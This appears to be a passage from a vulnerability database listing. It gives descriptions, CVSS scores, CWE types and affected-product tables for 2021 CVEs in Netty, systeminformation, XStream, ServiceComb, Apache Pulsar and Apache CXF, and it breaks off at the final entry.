
Vendor Product Version
netapp active_iq_unified_manager -
debian debian_linux 9.0
netapp oncommand_insight -
netapp service_level_manager -
apache nifi *
oracle commerce_guided_search_and_experience_manager 11.3.2
fasterxml jackson-databind *
netapp oncommand_api_services -
CVE-2021-21295 LOW

Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-444,CWE-444,

Products Affected

Vendor Product Version
apache zookeeper 3.5.9
debian debian_linux 10.0
netty netty *
netapp oncommand_workflow_automation -
quarkus quarkus *
oracle communications_cloud_native_core_policy 1.14.0
apache kudu *
netapp oncommand_api_services -
CVE-2021-21315 MEDIUM

The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N 2.5 4.0
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
apache cordova 10.0.0
systeminformation systeminformation *
CVE-2021-21341 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security-advisories@github.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-502,CWE-502,

Products Affected

Vendor Product Version
oracle webcenter_portal 11.1.1.9.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21342 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-918,CWE-918,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle communications_brm_-_elastic_charging_engine 12.0.0.3
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21343 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-73,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21344 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle mysql_server *
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21345 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N 1.3 4.0
nvd@nist.gov 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,CWE-502,CWE-78,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21346 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 6.1 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N 1.6 4.0
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,CWE-434,CWE-502,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle bi_publisher 12.2.1.4.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle bi_publisher 12.2.1.3.0
oracle bi_publisher 5.5.0.0.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21347 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 6.1 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N 1.6 4.0
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,CWE-434,CWE-502,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle weblogic_server 14.1.1.0.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
oracle weblogic_server 12.1.3.0.0
CVE-2021-21348 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H 1.6 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-502,CWE-400,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle mysql_server *
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21349 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 3.9 4.0
security-advisories@github.com 6.1 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N 1.6 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-918,CWE-918,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle graalvm 20.3.4
oracle webcenter_portal 11.1.1.9.0
oracle java_se 8u311
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle graalvm 21.3.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle java_se 7u321
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21350 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle weblogic_server 14.1.1.0.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
oracle weblogic_server 12.1.3.0.0
CVE-2021-21351 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 2.3 6.0
security-advisories@github.com 5.4 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N 1.0 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle mysql_server *
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21501 MEDIUM

Improper configuration will cause ServiceComb ServiceCenter Directory Traversal problem in ServcieCenter 1.x.x versions and fixed in 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-22,

Products Affected

Vendor Product Version
apache servicecomb *
CVE-2021-22160 HIGH

If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-347,

Products Affected

Vendor Product Version
apache pulsar *
CVE-2021-22696 MEDIUM

CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a "request" parameter, the spec also supports specifying a URI from which to retrieve a JWT token from via the "request_uri" parameter. CXF was not validating the "request_uri" parameter (apart from ensuring it uses "https) and was making a REST request to the parameter in the request to retrieve a token. This means that CXF was vulnerable to DDos attacks on the authorization server, as specified in section 10.4.1 of the spec. This issue affects Apache CXF versions prior to 3.4.3; Apache CXF versions prior to 3.3.10.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-918,CWE-918,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle business_intelligence 12.2.1.4.0
oracle communications_session_route_manager *
apache cxf *
oracle communications_diameter_intelligence_hub *
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle communications_element_manager 8.2.2
CVE-2021-23901 MEDIUM

